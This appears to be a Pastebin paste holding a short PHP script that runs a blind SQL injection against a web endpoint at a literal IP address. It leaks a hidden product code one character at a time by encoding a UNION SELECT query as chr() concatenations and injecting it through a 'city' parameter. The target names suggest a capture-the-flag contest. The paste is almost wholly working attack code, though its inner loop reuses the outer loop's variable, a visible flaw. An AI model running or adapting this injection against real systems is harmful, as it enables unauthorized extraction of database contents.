Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- for($i=0;$i<32;$i++){
- for($j=49;$j<126;++$j) {
- $query = "' union select 1 from secret_products where hidden_code like '".$pwd.chr($j)."%'-- -";
- $payload = '';
- for($j = 0; $j < strlen($query) - 1; ++$j)
- $payload .= 'chr('.ord($query[$j]) . ')||';
- $payload .= 'chr('.ord($query[strlen($query) - 1]) . ')';
- $s=file_get_contents("http://195.133.87.173/address_shops.php?city=''+union+select+rawtohex(PHD_IV_OWNER2.shop_private_pkg.get_product_quantity(".$payload."))+as+address+from+dual+--+-", false, $c);
- if(preg_match('/<tr>C102/', $s) && chr($j)!='%'&& chr($j)!='_'){
- $pwd.=chr($j);
- echo $pwd."\n";
- break;
- }
- }
- if($j==126){
- $pwd.="_";
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
